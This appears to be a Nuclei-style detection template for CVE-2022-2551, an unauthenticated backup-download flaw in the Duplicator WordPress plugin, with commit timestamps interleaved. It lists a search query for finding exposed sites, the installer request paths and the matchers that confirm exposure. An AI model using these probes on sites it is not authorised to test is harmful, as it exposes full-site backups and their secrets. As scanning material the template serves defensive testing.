2022-09-03 19:19:55 +00:00
id : CVE-2022-2551
info :
2022-09-26 17:19:56 +00:00
name : Duplicator < 1.4.7 - Unauthenticated Backup Download
author : LRTK-CODER
2022-09-03 19:19:55 +00:00
severity : high
description : |
The Duplicator WordPress plugin before 1.4.7 discloses the url of the a backup to unauthenticated visitors accessing the main installer endpoint of the plugin, if the installer script has been run once by an administrator, allowing download of the full site backup without authenticating.
reference :
2022-09-26 17:19:56 +00:00
- https://wpscan.com/vulnerability/f27d753e-861a-4d8d-9b9a-6c99a8a7ebe0
- https://wordpress.org/plugins/duplicator/
2022-09-03 19:19:55 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-2551
2022-09-26 17:19:56 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2551
2022-09-03 19:19:55 +00:00
- https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2551
2022-09-28 08:29:07 +00:00
remediation : Fixed in version 1.4.7.1
2022-09-03 19:19:55 +00:00
classification :
2022-09-28 08:29:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-09-03 19:19:55 +00:00
cve-id : CVE-2022-2551
2022-09-28 08:29:07 +00:00
cwe-id : CWE-425
2022-09-26 17:25:43 +00:00
metadata :
2022-09-28 08:05:18 +00:00
google-query : inurl:/backups-dup-lite/dup-installer/
2022-09-28 08:29:07 +00:00
verified : "true"
tags : cve2022,wordpress,wp,wp-plugin,duplicator,wpscan,cve
2022-09-26 17:24:38 +00:00
2022-09-03 19:19:55 +00:00
requests :
- method : GET
path :
2022-09-26 17:19:56 +00:00
- "{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1"
- "{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"
2022-09-26 17:27:53 +00:00
2022-09-03 19:19:55 +00:00
matchers-condition : and
matchers :
- condition : and
type : word
part : body
words :
- "<a href='../installer.php'>restart this install process</a>"
2022-09-26 17:19:56 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
